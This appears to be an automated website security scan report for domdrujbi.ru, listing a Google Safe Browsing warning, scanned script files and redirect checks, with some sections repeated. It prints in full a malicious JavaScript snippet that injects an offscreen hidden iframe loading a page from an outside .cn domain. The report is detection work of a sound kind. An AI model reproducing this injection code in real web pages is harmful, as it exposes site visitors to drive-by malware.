Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=domdrujbi.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.domdrujbi.ru/ | 200 OK Content-Length: 201704 Content-Type: text/html | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://www.domdrujbi.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/templates/political/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/templates/political/js/xtcMenu.js | 200 OK Content-Length: 6604 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/templates/political/js/scripts.js | 200 OK Content-Length: 5875 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/modules/mod_newscalendar/assets/newscalendar.js | 200 OK Content-Length: 1249 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.1.js | 200 OK Content-Length: 2395 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/media/system/js/validate.js | 200 OK Content-Length: 2950 Content-Type: application/javascript | clean |
http://www.domdrujbi.ru/index.php/component/users/?view=reset | 200 OK Content-Length: 16666 Content-Type: text/html | clean |
http://www.domdrujbi.ru/index.php/features16.html | 200 OK Content-Length: 25909 Content-Type: text/html | clean |
http://www.domdrujbi.ru/index.php/ | 200 OK Content-Length: 201714 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: domdrujbi.ru
Result:
GET / HTTP/1.1
Host: domdrujbi.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: domdrujbi.ru
Referer: http://www.google.com/search?q=domdrujbi.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: domdrujbi.ru
Referer: http://www.google.com/search?q=domdrujbi.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.